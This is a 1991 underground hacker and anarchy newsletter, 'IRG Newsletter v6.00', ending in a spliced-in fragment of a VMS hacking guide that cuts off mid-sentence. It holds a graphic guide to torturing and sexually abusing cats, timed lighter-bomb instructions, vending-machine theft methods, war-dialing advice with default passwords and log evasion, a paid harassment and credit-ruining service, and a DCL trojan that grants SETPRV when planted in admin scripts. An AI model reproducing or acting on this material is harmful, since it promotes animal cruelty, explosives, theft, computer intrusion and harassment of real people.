////// /////// //////// // // // // // /////// // //// // // // // // ////// // // ///////// International Rogues Guild and Shadow/Net Presents... IRG Newsletter v6.00 Released: 2/20/91 Written by: Haywire Edited by: Haywire Hi everyone, Heres IRG number 6 for ya, more people are getting interested and I am happy about it. Theres alot of good stuff this time(like always, hehe) so read up. 5.01 Table Of Contents ---------------------- 5.01...................................Table Of Contents 5.02...................................Disclaimer 5.03...................................More About IRG 5.04...................................CyberPunk Follies 5.04b..................................State Of The Union Reply by Psycho 5.05...................................Letters From Prison 5.06...................................Planned Parent Hood For Cats by Damaged 5.07...................................Disposible Lighter Bombs by Psycho 5.08...................................Vending Machine Revenge by Psycho 5.09...................................The Art of Scanning by Control-S 5.10...................................Hacking CompuServe by Control-S 5.11...................................Dos Trips by Wasteland Warrior 5.12...................................Running The ShadowNet 5.13...................................VMB's From Hell 5.14...................................Hellos and Goodbyes 5.02 Disclaimer --------------- All items in this newsletter are meant for informational purposes. It is written to encourage illegal activities, I hope the reader is inspired to break the law after reading all IRG Information. Of course the authors of this newsletter cannot be held for anything that the reader does. WARNING: Remember ALL explosives are dangerous, DO NOT, I repeat, DO NOT mess around with any of the recipes for explosives, EVER! These recipes are real, they can kill you, and anyone else. Make sure you know what you're doing. Otherwise its your fault. 5.03 More About IRG ------------------- We have one new ShadowNet member this issue and a new journalist. Hopefully you people are getting the idea and starting to write things for ANY group, just sharing the wealth of info out there. Until next time... IRG Members Rank ----------- ------ Haywire IRG and ShadowNet Leader Wasteland Warrior Part Time Programer,Game Winner,IRG Member Psycho (615)ShadowNet Member Dr. Digital (619)ShadowNet Member Damaged IRG's "Sick" Member Journalist ---------- Haywire The Spectral Demon Control-S Kryptic Night Psycho Damaged Wasteland Warrior Thats about it, if you feel like becoming a member of either IRG or ShadowNet. Please call one of the IRG nodes. If you would like to become and IRG node again contact one of the IRG nodes. 5.04 CyberPunk Follys --------------------- I have only gotten one reply to my "State Of The Union" speech, it seems that either people don't care what I say or they areto lazy to call up my board and give me a response. It seems that the Hacking community has turned to shit more then I had thought. But maybe people will get the idea one day and move on to a higher level. 5.04b State Of The Union Reply by Psycho ---------------------------------------- In response to Haywire's "State of Hacking Today" editorial in IRG #05, I would like to make the following comments: I agree with Haywire 100%- This shit over "Hacker Wars" has gotten WAY out of hand... What in the hell is wrong with people?!? Isn't hacking supposed to be a means by which we SHARE information and spread the wealth of knowledge? We hackers have before us an incredible realm of POWER- This has been exhibited time and time again; Everytime you hear of some kid who hacked into NASA or someplace and got caught, there are probably dozens more getting away with something just as spectacular. In short, we have the ability to manipulate and control the flow of ALL manner of electronic information. The authorities are starting to realize the actual scale to which systems can be hacked into, but it is far too late to do anything about it. For every hacker that gets busted, five more take his place- and it's a never-ending cycle. United and working together as one, hackers have the propensity to virtualy control (or shut-down) many facets of our society on a GLOBAL scale: banking, sattellite communications, military, law enforcement, etc., etc.... But instead of working together, the hacker community is splintered into many factions, all more or less working against each other. Instead of liberating information for all, we are instead battling it out in our own little area codes, searching for short-lived fame. I'm not saying that we should shut down all systems and holds the world's data for ransom; That would be futile. Instead, we need to help educate those with an interest in hacking but lack experience. Not that we should toss info out to anyone- There are still (and always will be) certain type of people that "just don't get it"... A little information and a lot of stupidity can be a dangerous thing with this type of "wanna-be". By a careful process of weeding out these types, the data will begin to flow into the hands of those that can best put it to use. So, in 1991, let's try to unify and SHARE our expertise- And I think you'll find that the hacking/phreaking community will benefit from this like never before. Hats off to Haywire and everyone else involved with the IRG for publishing this fine newsletter and making an effort for change. -Psycho 5.05 Letters From Prison ------------------------ I have been getting alot of stuff, this issue and I am very happy about it. The more the better, it always seems like I never have enough stuff. This issue is pretty long getting into alot of good stuff. This is a great issue check it out... 5.06 Planned ParentHood For Phelines by Damaged ----------------------------------------------- Phile #1 of a series Unknown @-@-@-@-@-@-@-@-@-@-@-@-@-@- - @ @ Planned ParentHood for - - @ @ Phelines - - @ @-@-@-@-@-@-@-@-@-@-@-@-@-@- WRiTTEN BY: Damaged 2.14.91 iNTRO Ok dudes this is my phirst seriers of Anrkey philes on Kat's. Don't you just hate those little pussy's, i sure in the hell do. Anyways, the phile is all How to do it yourself Home Kat abortions. Why the reason for kats, well i hate the goddamn shitheads for specific reasons. That i won't get into. Well enjoy the phile and have phun. SHiT YA'LL NEED Propane torch Koat Hanger Gloves Rope Nails Hammer Drugs & a Kat of kourse GET'N STARTED Ok, now get the above required stuff. Now toke a little, phry or whatever get's ya going. Phirst off take the koat hanger and bend it into a phairly straight wire. Take the koat hanger and make a noose on one end. You need to make sure that the noose is small enuf to phit into da Kat's Kunt. PHUN PART Ok now go out and phind yer victim. Well you have phound a kat, put on the gloves so you don't get scratch to hell and back. Now this is where the optional shit komes in. You kan either Nail the phucker to the ground by hammer'n nails thourgh it's pheet. This technique i phind to be the most effective. Or if your one of those squemish types (why the phuck are you read'n this then??) you kan use the rope. Just spread the phucker's legs to the phour korners. Tie the rope around each paw and tie to something else. Now you have the kat down supplied and bagged. Reach over and grab your nice instrument(koat hanger) and also grab the torch. Now you should be still wear'n the gloves, if not jack'n off will be a little harder phor you to do now. Anywayz, heat up the end of the noose with the oval end or however the phuck you made it. Wait until the shit is shine'n real bright orange or yellow. Some koat hangers will even turn white, now make sure you don't melt the damn noose. duh Insert the heated end of the noose into the kat's kunt, now jam the phucker all around, make sure you get every last one of those bastard kittens outta there. After you have phinished, unnail or untie the kat. Now i doubt it will walk away, but if you know who owns that kat, be a phriendly neighbor and drop it off at their house phor them. Now you really don't know which Kat is or not pregneat so hell try evey one of those pussy's. Now this also works for dogs, and even try this on yer girlphriend if you even knock her up. OTHER SiCK SHiT Now some other phun shit to do while do'n this. Bring along a tape recorder or a kamcorder and record the shit. Go home listen or watch it over and over again. Loads of phun dude. Now for you sick perverts, take a knife and just make the kat's kunt big enuf to slide yer dick in, hell a phree phuck. You kould also bang the phucker up the ass to if ya wanted. The best part about this is that it's like bust'n a virgin everytime and you don't have to wear a kondom either! Oh yea while ya do this phry really hard too. Yo'S & PHUCK oFF'S Yo's to LoL-PHUCK, THG for thier latest kracks, Sam Brown for all his nice back doors to Emulex, METALLiCA, Lutzifer, and all who think that they deserve some yo's (yea right) Phuck off's to PE Give it up, THG got yer ass Kicked, Acid Alliance, QSD lamers, Alto's you need to UPGRADE big phuck'n time, leeches, and all those K-Rad K0de KiDZ who do noth'n but phuck'n leech as hell and get Kaught too. KALL THESE KiCK'N SiSTEMS Insanity Lane..........619.591.4974 -=> IRG HQ <=- Zanaphopia.............404.642.8703 -=> AoA HQ <=- The Corrupt Society....619.630.8450 -=> NHA HQ <=- Demon's Crypt..........516.791.1427 -=> SoC HQ <=- Phreak Accident........404.977.4272 Latur dudes Damaged [--------------------------------- EOF ----------------------------------] 5.07 Disposable Lighter Bombs ----------------------------- ************** * * * Disposable * * Lighter * * Bombs * * * ************** by PSYCHO Written EXCLUSIVELY for The IRG For those of you who are budding anarchists or Mad Bombers, but don't feel comfortable cooking up nitroglycerine in your mom's kitchen or making pipe bombs in the garage, here's a fairly decent alternative that is safe, easily transported, cheap, and effective if used properly. All you need is a good supply of those shitty disposable lighters, like a Bic for instance. These can be bought cheaply (or stolen, if you're so inclined) at every damn convenience store between here and East Camelfuck, Iraq. Prices range from about 39 cents for averaged-sized lighters, up to about $1.79 for the extra-large ones, such as the Cli-Cla (my personal favorite- it is a HUGE disposable, holding about 65% more butane than the large Bic! They're available at fine truck stops everywhere...). Here is a chart to help you decide which lighter is best for your explosive needs: Lighter | Size of Explosion * ---------------------------|---------------------------------- Mini Bic | Small; 4 to 6 inch fireball | Scripto | Medium; 6 to 12 inch fireball | Regular Bic | Large; 12 to 18 inch fireball | Cli-Cla | HUGE; 24 to 30 inch fireball -------------------------------------------------------------- *(NOTE: These sizes are only an APPROXIMATION based on past observances- fireball size and intensity may be affected by such factors as atmospheric pressure, wind speed, humidity, manufacturing defects, etc. Your results will vary.) As you can see by the above chart, some of these lighters can be quite powerful. To give you a better frame of reference, consider the Mini Bic to be as powerful as an average firecracker, the regular Bic as powerful as an M-80 firecracker ( a REAL M-80... You can only get them illegally in this country- they are equal to 1/4 stick of dynamite), and the Cli-Cla as powerful as 1/3 to 1/2 stick of dynamite, under perfect conditions. PREPARATION AND METHODS OF DETONATION To prepare a lighter for use as an explosive device, the only real modification that must be made is the removal of the flame guard. The flame guard is the semi-elliptical piece of metal that is found on top of the lighter which encases the gas jet and flame adjustment mechanism (if present). This is easily removed by using a screwdriver (or even a finger) to pry away one edge of the flame guard, and thus popping the whole thing loose. With the above out of the way, you are ready for the placing of the device. Keep in mind that since the laws of physics declare that a force will always follow the path of least resistance, some forethought should go into the placement of the device for best results. If you just want a purely-for-the- hell-of-it explosion, the lighter can be placed on open ground, but for a specific purpose, such as the destruction of an object, opening of a door, etc., the lighter will need to be wedged as tightly as possible against the target. The only "timing device" you will have, such as it is, is the actual flow of gas from the lighter. Some lighters have no flame adjustment mechanism, and thus you have very little control over when the explosion will take place. On lighters where the control is present, you will be able to approximate the point at which detonation will occur. This is accomplished by turning the adjustment wheel toward the <+> or <->, with the <+> side naturally exploding faster. In some lighters, the maximum <+> setting can be over-ridden to allow the butane to escape very quickly, but keep in mind that the faster the gas escapes, the lower the power of the resulting explosion. You may find some experimentation necessary with different types of lighters you plan to use before you can become familiar with the approximate detonation times. Once you have decided on a target and length of time needed to escape and/or take cover, you are now ready to ignite the lighter. The most important element to keep in mind it that the gas release lever MUST remain depressed for the duration of time until the explosion occurs. There are many methods for assuring this, as pointed out below: A. Wedge the lever in the open position by placing an object between it and the striking wheel. B. Glue the lever down with a glob of Crazy Glue. C. Tape the lever down with aluminum strapping tape (regular tape will not work due to rapid melting). D. Wire the lever down with a few inches of light-gauge copper wire. These methods are not the only absolute choices you have, but I have always had good luck with them. Once the lever has been secured, you need to act as quickly as possible, to ensure as little butane as possible is wasted. Using another lighter, ignite the stream of gas escaping from the one you want to explode. Another factor you might want to consider for timing is the physical direction of the tank of the lighter in relation to the flame- If the flame is above the tank (as in normal operation), it will take much longer for the heat to melt the plastic and cause the detonation than it would if the tank was placed at a 45-or-so degree angle with the flame being BELOW the tank. Here is a chart of approximate times based on positioning of lighter and gas flow: Gas | Lighter Upright | Lighter Inclined Flow | (flame above tank) | (flame below tank) ================================================== MIN. | 5-10 minutes | 3-5 minutes --------|---------------------|------------------- MED. | 3-5 minutes | 1-3 minutes --------|---------------------|------------------- MAX. | 1-3 minutes | 60 seconds or LESS Again, these figures are APPROXIMATE- Times will vary according to many factors including, material used in manufacture, quality of butane, etc. Using the above chart as a guide, plus some experimentation on your own, you should be able to discern timing factors relating to your individual needs in certain situations. Of course, lighting the butane and allowing it to melt the plastic tank casing is not the only method for detonating disposable lighters- other possibilities include: * Affixing a large firecracker or other small explosive device to the tank * Placing the lighter in an open flame (campfire, fireplace, etc.) * Placing the lighter on, in, or near a heat source (engine block, tail pipe, oven, space heater, etc) As you can see, however and wherever you choose to use a lighter as an explosive, it is a cheap and (usually) ample solution. Always use great care and common sense when handling ANY explosive device, and have your escape route or cover picked out well in advance. Also be aware that, due to the materials used in it's construction, an exploding lighter will hurl bits of metal and molten/flaming plastic, sometimes for several yards in all directions. HAPPY BOMBING! Thanks to: Haywire & The MIGHTY IRG! Special Thanks to: The Phantom Fireman for his pyromania expertise. 5.08 Vending Machine Revenge ---------------------------- VENDING MACHINE REVENGE by Psycho Written for the IRG How many of you have ever been ripped off by a vending machine? I would guess that EVERYBODY, at one time or another (and probably MANY times), has met up with a "change eater". This can be frustrating as hell, especially if you're hungry or thirsty and the machine took all the change you had. Worst of all, many times the owner of the machine takes his sweet time getting it fixed- After all, any money you lose is pure profit for him. The following is a collection of various techniques that have been used with great success to extract revenge on these money-grubbing bastards, and can put a few bucks in your pocket as well. I guess some unscrupulous person COULD use this information just to rip off other hapless consumers, but that is their discretion (ha ha!). 1.0 SLUGGING This is one of the most common forms of Vending Machine Revenge (from herein referred to as VMR), and also one of the safest. Basically this involves putting something into the machine that is not a coin, but the machine will think it is. Experimentation of a high degree will be in order here, as all machines have different levels of sensitivity. Some of the more common items used include: metal washers, arcade tokens, foreign coins, plastic discs, etc. I think you get the idea. I have even heard of people using a bench grinder to file pennies down to dime size, but that seems like an awful lot of work for 9 cents, but how you want to spend your time is up to you. Again, you'll have to experiment a lot with this one. If anyone finds some that work particularly well, leave me a message on the IRG/Insanity Lane node, and I'll draw up a chart for a future issue. 2.0 TIPPING Another quite popular method, this is accomplished by physically tipping the machine forward as far as you can get it, hence the name. This works best on those machines that have potato chips and stuff dangling from long metal rods, and also those that use spiral rods to hold the stuff. If you want to use this method of VMR to the fullest, it's best to take along a couple of stout friends. Reason being, you will get the best results by practically putting the front of the machine down to the floor, and some of these bastards can be REAL heavy. So, DON'T try this one alone (unless you look like Arnold Schwarzeneggar), and make sure you do it quietly and in an out of the way area to avoid getting caught. 3.0 ROCKING The Rocking method for VMR is similar to the above, but is seems to work best on coke machines which dispense cans. To get free cokes, you rock the machine back and forth, really banging the hell out of it. This confuses the machine's coin mechanisms, and it will usually start spitting out cokes. This VMR method will also require the assistance of friends, for obvious reasons (coke machines are the heaviest of all vending machines). This one must also be executed in a very deserted place, due to the excessive noise level created. You'll also want to remember to take along some backpacks, pillowcases, etc., to put your free cokes in. I have seen machines completely emptied using this method. 4.0 PLUGGING So far, we've only discussed methods with which you can obtain free snacks- Now, here's one that can net you some good pocket change. Unfortunately, this will only work as described on newer coke machines. Perhaps with experimentation, it can be adapted for use on other machines. Plugging is accomplished by doing just that- you use something which will get hung in the coin slot, such as a penny, slug, etc., but will still fall through when the coin return is pressed. On newer coke machines, the coin return is a long piece of horizontal metal that presses straight down. After inserting your plug, use a flat-blade screwdriver to bend the coin return bar so that it cannot be depressed. Now, take the rest of the day off and do whatever. When you return later that night, use your screwdriver to bend the return lever in the other direction. When you press it down- JACKPOT! You get all the coins that other people have "lost" that day. Rotate among different machines, and don't plug the same one more than once a week to obtain best results. By doing this to enough machines in various locations, it's possible to make around $100 PER DAY (the average take for one machine is usually around $5). Another good place to do this occasionally is coke machines in expensive hotels, since they usually inflate the price of their drinks by 50% over normal machines. Be extremely careful and don't get TOO greedy, and this method is very safe. 5.0 JAMMING-1 This type of VMR is one of the best for getting lots of free stuff. What you do is actually jam the "product chute" (where the goods come out). Any manner of things can be used to do this. For instance, open the little door on a coke machine where the cans come out. Now, take a stick, huge wad of paper, etc., and cram it as far up into the machine as you can comfortably reach. This will block the arrival of anyone's purchase, and you only have to pull out whatever you blocked it with on your return to retrieve the stuff. On cigarette machines, you can even put tape over the side slot where the smokes are dispensed to accomplish this. As in some of the above methods, experimentation will be in order here to learn about the machines in your area. This is a fairly safe method of VMR. 6.0 JAMMING-2 This is the same as the above method, but instead you jam the change return slot. It's not as profitable as screwing up the coin return, but hey- it's FREE money. You may have to use a small wire to accomplish this on machines that have a small door that opens inward on the change slot. Again, if done smartly and not too often to the same machine, this VMR method is safe. 7.0 ZAPPING Personally, I have never been able to get this one to work, but I know people that swear by it and say they use it all the time. Also known as "shorting", this type of VMR involves locating the socket where the machine is plugged in, and rapidly working the plug back and forth, causing the electronics in the machine to screw up. I'm told it only works on machines that have an LED display showing the amount you've dropped in. One person claims to have "maxed-out" the display at $9.99 and got that much OUT of the machine when he hit the coin return! Like I said, I've never been able to do this, but there are lots of people who claim it can be done. Experiment and find out for yourself, and drop me a line if you get it to work. 8.0 KILLING This isn't as drastic as it sounds- It actually means that you unplug the machine, thus "killing" the power to it. Some machines, when unplugged, will simply NOT return any coins. And, you'd be surprised at how many people will go ahead and stick money in a machine, even if it's not lit up... And most people won't look for the plug to check it, either. This is a very safe, quiet method that has been proven to work on certain machine. As before, experiment with machines in your local area. Well, that should be enough ideas to get you started- I'm sure there are many, many more. If you have a particular favorite, leave me e-mail on Insanity Lane and I'll include them in any future updates of this article. In the meantime, just remember not to get too greedy, and you can have a tidy little income from your VMR exploits. Thanks go to: Haywire & the IRG for publishing the newsletter and allowing me to write this article. Special thanks to: The Bubblegum Bandit, H.R. Puffenstuf, & Headhunter for their input in compiling this article. 5.09 The Art Of Scanning by Control-S ------------------------------------- +++++++++++++++++++++++++++++++ ++ ++ ++ The Art Of ++ ++ *->> Scanning <<-* ++ ++ ++ ++ By: Control-S ++ ++ ++ +++++++++++++++++++++++++++++++ This file is written for International Rogues Guild (IRG), and is the second in a series of files aimed towards the begining hacker. If you've been around a while, you will most likely find nothing of use here. Part 1: Scanning, the art of Part 2: Scan-Pages v1.00 Disclaimer: This phile is for informational purposes only, and I cannot be held responsible for the actions of anyone reading it. WARNING: If the words "k-kewl", "d00d", or "k-elyte" are a part of your every day vocabulary, stop reading now, you are to far gone for help. Scanning: Scanning is one of the most legal aspects of hacking, and a lot of fun too. I'm not saying that scanning IS legal, I really doubt you could get anyone to answer that question. If the SS wants to bust you, they will do it for scanning, or anything else they feel like, if theres no law against it, they will make one up! You can't win, so I would just recommend that you watch your step no matter what you do. You can scan many diferent places, like x25 networks such as TymNet and Tele(Sprint)Net or simply telephone exchanges, which is what I'll be going into here: Scanning your local exchanges, I basically view this as 'getting to know your neighborhood' - its good to get an idea of how many modems are in yer area, and just what sort of 'puters are connected to them. You'll more than likely come across a few Unixes, and some VMS', if you're lucky, you'll find a LAN or WAN, and be able to reach a bunch of different systems from one number, some of these even connect to far systems, some with outdials (which you can scan other areas through), or gateways (where you can hook into even more systems and/or psn's). Things You Need: *Personal Computer - (almost any type) (Amiga recommended) *Modem - (any baud) (at least 2400 recommended) *A Wardialer or Scanning program - These are available for just about every type of computer, but if you can't find one, they are easy to write yourself, in either basic or even scripting. (I would highly recommend you write your own, its a good way to get started programming and you can customize it to do exactly what you want it to.) *References - You should have on hand (or commited to memory) some text files or manuals that will help you identify the systems you find, and then give you and idea of how to get in and possibly use them. (You can find detailed 'how to' files on just about any operating system you might find in many Phrack newsletters, if you don't have them all, get them!) - (See appendix A of this file for simple system identification). *A little common sense - sorry, you're on your own with this one. Getting Started: Using that little bit of common sense, you should fire up your computer and modem. (If you can't get by this part, you should stop reading this file immediately, run down to your nearest computer store, and trade your PC in for a nintendo!) For best results, you will want to do some sort of sequential scan, this way you won't miss any carriers. If you are paranoid about leaving a sequential patern, (the SS looks for this sometimes, trying to catch 'c0dez kidz') then you will have to make some part of the dialing random. Making the whole scan random has a few problems; if you wan't to make sure you get all of the numbers, and don't keep going over the same ones, you have to keep track of all the numbers dialed and check it every time before dialing. This is a big waste of time, the best way to do a sequential scan without a patern, is to use a node dialer. Node dialers are common in code hacking programs, and these are easilly modified to just scan. The ideal configuration for a node dialer (the one I use) would be to use 10 nodes, each scanning 1000 numbers in the same exchange, then just randomize which node is dialed. Example: Node 1 Dials 0000->0999 Node 2 Dials 1000->1999 Node 3 Dials 2000->2999 Node 4 Dials 3000->3999 Node 5 Dials 4000->4999 Node 6 Dials 5000->5999 Node 7 Dials 6000->6999 Node 8 Dials 7000->7999 Node 9 Dials 8000->8999 Node10 Dials 9000->9999 ATDT + This method is just as fast as dialing them straight out, you don't miss any numbers, re-dial any numbers, and you aren't using any detectable dialing pattern (other than possibly 300 calls per hour). Now that you've got your dialer configured, you need to find a good time to scan. Again, if you're paranoid, you should stick to scanning between 9AM and 5PM. This is for two reasons; 1) This is the when most buisness calls are made, and in the huge volume, you will be that much harder to detect. 2) If you DO get busted (can you imagine going to court for such a thing? hah!) you will have a good case, as many people dial sequential numbers durring this time, (re: telemarketers, surveys...). This is also probably the time when you'll be at work/school/whatever, so you won't be needing your CPU. (I personally scan while I'm asleep, at night - I'm not that paranoid!) As a rule of thumb, don't watch the dialer. For some reason, no carriers are detected while you watch the scan in process. (I've heard rumors that this is the result of a minor disturbance in the local space-time-continuum caused by invisible emissions from the iris, but have seen no proof to back this theory.) Okay, now you have your dialer ready and a good time to scan. Fire it up and check on the progress every few hours. After you scan out a fair sized list of carrier signals, you should give the dialer a rest, boot your favorite term program, and investigate all your finds. Don't expect to see something like this: "Welcome SysOp!" on the systems you check, in fact, expect nothing. Many systems don't wave any banners or tell you anything, you have to try and coax a responce out of them. Things to try would be: 's, Ctrl-C, or any other Ctrl-'s, (if you send a Ctrl-S, be sure to send a Ctrl-Q after it, because many systems use this as a 'halt-output' switch, and you may discover the right keys to press, but never know it because all output is stopped. Try sending "..." or @'s, [Esc], and sending a hard break almost always gets some responce, if none of the above work, try any character on the keyboard, and words like "boot, start, run, load, logon, login". If you have an external modem, keep an eye on the "Recieve Data" light, if it flickers and you aren't getting anything echoed to your screen, or possibly a lot of garbage characters, switch to 7E1, or call back at a lower baud rate. (I've found a bunch of systems with modems that will connect you at 2400, but the com ports will only transfer data at 1200 or 300) If you try everything and can't get any responce at all, it could be a company which turns its computers off at night, but leaves the modem on (so call back in the day), a crashed system, or a hacker who got your scan-call at 3am and wistled an unerring 8N1 into his reciever at a steady speed of 2400 bits per second. -heh When(if) you identify the operating system, break out your references, and try all the default accounts. If you get in on a default, but you're unfamiliar with the particular OS, don't mess around, just log off and do a little research, learn how to turn off all the logging and cover your tracks, then go back and have phun to your hearts content. Remember: keep notes on all the systems you find. You never know when some ancient OS might come in handy, or what you might find that relates to any system while trashing at a later date! Apendix A: The following is a short chart to help you identify operating systems. System Prompt Default Accounts/Passwords --------- -------------------- ------------------------------------- Unix login: -or- Login: root,daemon,bin,sync,uucp/(unpassworded) VAX Username: SYSTEM/MANAGER -or- FIELD/SERVICE DEC-10 User ID: 1,2/ ? HP-?000 PLEASE LOG IN: HELLO,MANAGER, Iris ACCOUNT ID? MANAGER VM/CMS IBM VM/370 ONLINE logon (user id) NOS FAMILY: Primos "PRIMENET XX.X.XXX" login SYSTEM/SYSTEM -or- OPERATOR * This hardly all-inclusive, only the ones I know from memory, you should try and compile your own list, and add new systems to it regularly. This has been a phree Speech publication, (C) pSp and IRG 1991 As usual, I can be contacted for whatever on any of the IRG nodes, or IRG e-mailing addresses. Please mark all comments "Attn: Ctrl-S". Control-S, Freelance G-File Artist (for hire) Scan-Pages v.99b: Note: Unfortunately, I will be unable to finish my current scan in time for the next IRG release, so I stuck this partial scan in to fill the spot. Look for a complete scan in v1.00, next IRG. NPA/NUM-BER Baud System/Comments ------------ ----- -------------------------------- 619/259-0038 n/a ?/constant tone 619/270-0017 1200 ?/has echo on 619/270-0038 2400 ?/"Unauthorized User, Call Recorded and Disconnected" 619/753-0006 n/a ?/constant tone (may be loop) 619/753-0013 n/a ?/constant tone 619/753-0171 1200 ?/"D29 System C, Node XX, Line XX" 619/753-0172 1200 ?/"D29 System C, Node XX, Line XX" 619/753-0173 1200 ?/"D29 System C, Node XX, Line XX" 619/753-0174 1200 ?/"D29 System C, Node XX, Line XX" 619/753-0175 1200 ?/"D29 System C, Node XX, Line XX" 619/753-0176 1200 ?/"D29 System C, Node XX, Line XX" 619/753-0243 2400 ?/(sending a hard break makes hangup) 619/753-0287 1200 TRW Dialup 619/753-0288 1200 TRW Dialup 619/753-0548 1200 ?/"D29 System C, Node XX, Line XX" 619/753-0716 1200 ?/"ALPHA BASE, PLEASE LOG IN:" 619/753-0738 1200 ?/(just hangs up, maybe callback security?) 619/753-0911 1200 ?/(response to break ^Z) 619/753-0916 1200 ?/(response to break ^Z) 619/753-0933 1200 ?/(response to break ^Z) 619/753-0962 1200 ?/(response to break ^Z) 619/753-0981 2400 HP-?0000/PLEASE LOG IN: (try 'help') 619/753-1550 2400 PC-Plus Host Mode/ American Bamboo Society 619/753-2614 1200 ?/(absolutely no activity - a modem with no 'puter?) 619/753-2728 2400 "Host Name:" (^C will get "User ID:") (CIS, node ENC) 619/753-1654 2400 ?/Esc will get "ACCOUNT-ID: / PASSWORD:" 619/753-1079 1200 ?/"D29, System C, Node XX, Line XX" This is hardly a complete list, its more or less the result of boredom, and fairly random scanning through an outdial, it does cover about 1/3 of the 619-753 exchanange, but I never finished because of lack of time and other projects taking precedence. I would like to try and organize a concerted effort to map out any/all NPA's, and eventually publish a masterlist of all detectable carrier signals. Its easy to do, and you can usually let yer computer scan while yer gone to school/work, so if you'd be interested in helping out, leave me a note on one of the IRG boards and tell me the NPA and excknes you'd be `BLe to scan, via local call or some sort of outdial, so we can make sure that different people aren't wasting time scanning the same exchanges! Anyone who helps to build the list will g1 at Glasgow End of file - Frm 9; Next> 6.BBSs From Hell ---------------- Here is this issue's installment of BBSs From Hell. Board Name Phone Number NUP SysOp ------------------------------------------------------------------------------- Shadow's Of Doom 313/274-5630 ? ? Fornax 408/370-0722 ? Briareos The Rocky Mountains 714/530-6258 ? ? The CorrupT SocieTy 619/630-8450 Defiance The Spectral Demon Land Of Karrus 215/948-2132 Nightmare Scooter Next issue we will have five more Elite BBSes for you to try. Sorry if I have placed your bbs number on here without your knowing, if you would like it removed from the master list please E-mail me at Insanity Lane 619-591-4974 NUP: Last Try. 7.VMBs From Hell ---------------- Heres a little plus I decided to have in each IRG news, a VMB list it will work like the BBS list in that I will have 5 VMBs each issue and every so often I will have a master list printed. All changes to VMBs will be posted in each IRG News. VMB Number Box Number VMB Use ------------------------------------------------------------------------------- 1-800-877-7594 Code Line 1-800-848-1488 * 0 Code Line / Info Line 1-800-741-5881 9 + * * 1111 Code Line / Info Line 1-800-950-0203 289 Time Lord's Code Line/ Info Line 1-800-950-0203 617 Code Line / Info Line Well thats it for this installment of VMBs From Hell. If you would like you VMB in IRG News please leave mail at IRG/ShadowNet VMB #1 1-800-527-0543 Box Number: 8 + 158. 8.Running The ShadowNet ----------------------- ShadowNet is the newest addition to IRG. It is a information service for anyone willing to pay. ShadowNet works the way a Private Investigator works...you pay us to find out information on people, except we will do much more than that. We will go one step farther than any PI would go. We will change his phone #, send him 100 pizzas, or ruin his credit rate. Of course the more you pay the better you get. At the beginning we will work for free to show that we can do what you ask. So get your orders in fast. All we need is a name, phone number, handle, whatever. The more information you start giving us the more you will get back. I also am in need of "agents" or people to help work with me. I hope to get at least one person in each area code so information can be found easier and faster. Of course you are not restricted to the computer oriented community. We can and WILL find information on ANYONE. We'll also work for anyone who is willing to pay. So let's hear from you, either on my BBS/VMB. Give me your voice phone number, and your name. I will contact you for who you want ShadowNet to find out about. If you would like to join leave the same info but tell me that you want to join. Simple enough. Until Next time. 9.Hellos and Goodbyes --------------------- So you are now done reading IRG-03, I hope you enjoyed yourself. I am sure the more IRG Newsletters me and The Spectral Demon put out the better they will get, if possible. TSD and I have worked hard on this newsletter and now its your turn. Hurry & get those letters in for the next IRG News. Now for the hellos & goodbyes, greets and etc! FiRM what ever happened to you? INC ditto! Kryptic Night do you do Magic Mushrooms? PHA whats next for you? * Greets to Elite Tabloid Underground What ever happened to the Elite community? Strike Back! Remember: Big Brother Is Watching Freedom Of Speech! * - Entries marked with *'s are by The Spectral Demon only ------------------------------------------------------------------------------- This Is An Offical IRG/ShadowNet Production All Rights Resevered Copy Write (C) Jan. 1 1991 ------------------------------------------------------------------------------- Call The IRG HeadQuarters: Insanity Lane Home Of IRG 619-591-4974 NuP: Last Try Running Aftershock 1.21 Call here for the latest in IRG Productions, and invaluable P/H/C/A information found nowhere else, except at: The CorrupT SocieTy IRG Node 02 619-630-8450 NuP: Defiance Running AfterShock 1.21 Also Call This Fine IRG/ShadowNet VMB #1 1-800-527-0543 Box Number: 8 + 158 First of course you MUST check for the privileges of the user (just like in the above program), then try: $open/write file sys$scratch:adduaf.tmp $write file "$ RUN SYS$SYSTEM:AUTHORIZE" $write file "MODIFY NAME/PRIV=SETPRV" $close file $@sys$scratch:adduaf.tmp/output=sys$scratch:adduaf.dat $del sys$scratch:adduaf.*;* This little patch in the coding will modify your own users privileges and give them SETPRV when the superuser executes this routine. The trick is to hide it within some other program so he doesn't even realize he has done anything! Of course after the routine has been successfully executed, the original coding should be put back. There are many places you can put this routine, including ADDUSER.COM (if you have write access)! That would mean, every time the system manager went to add a new user, he would also boost your privs! HaHa, quite ironic eh?! The farthest thing that he wants to do, and you make him do it without even realizing. Of course you should use your imagination and put this or a similar routine in a place where it will be quickly executed. The longer the code stays around without being execute, the more chance that it will be discovered. An optimum program would be something that the users/operators execute frequently (eg notes, mail, phone etc) Other good places are the LOGIN.COM and SYLOGIN.COM files. Just remember to cover your tracks once you're done!! This is but a brief introduction to Trojans and the like. You should use your own imagination to come up with other ways of making the system operators succumb to your wishes...heh heh. DCL PROGRAMMING --------------- No file would be complete without at least mentioning programming Command Procedures. Basically, these are like BAT files from MS-DOS or script files from UNIX. They form a rudimentary but powerful language that allows you to quickly create small programs to handle most simple tasks. This section is not intended to be a a full blown tutorial on programming in DCL, rather its an introduction to what it is all about. It is quite easy to pick up programming in DCL and the best way to learn is to have a look at some of the COM files you will find on the various VAXes that you hack on. By studying these, you can quickly learn the methods on how to perform certain routines. Below I have listed some of the commonly needed routines when programming in DCL: PASSING PARAMETERS Parameters can be passed to DCL programs directly from the shell in several ways. Here are a few examples: (1) @sample 24 25 When you execute this, the values 24 and 25 are passed to the sample.com file in the variables p1 and p2 respectively. ie p1=24, p2=25 (2) @sample Paul Cramer p1=PAUL, p2=CRAMER (3) @sample "Paul Cramer" p1=Paul, p2=Cramer (4) name= "Paul Cramer" @sample 'name' This example demonstrates the mKof passing predefined variables to a command procedure. In this case, p1=PAUL, p2=CRAMER (5) name ="""Paul Cramer""" @sample 'name' Note that passing the variable in three double-quotes preserves the case. p1=Paul, p2=Cramer GETTING INPUT Often it is necessary to get some sort of input from the user when executing a command procedure. This is performed through the INQUIRE command. Some examples follow: (1) INQUIRE variable "prompt" This will display the 'prompt' message and then wait for input. The string passed is kept in 'variable' (2) INQUIRE/NOPUNC variable "prompt" When you specify /NOPUNC, the prompt will NOT be followed by a colon and space as is the default. (3) INQUIRE/LOCAL variable "prompt" INQUIRE/GLOBAL variable "prompt" It should be noted that if you specify /LOCAL, the variable will remain in the 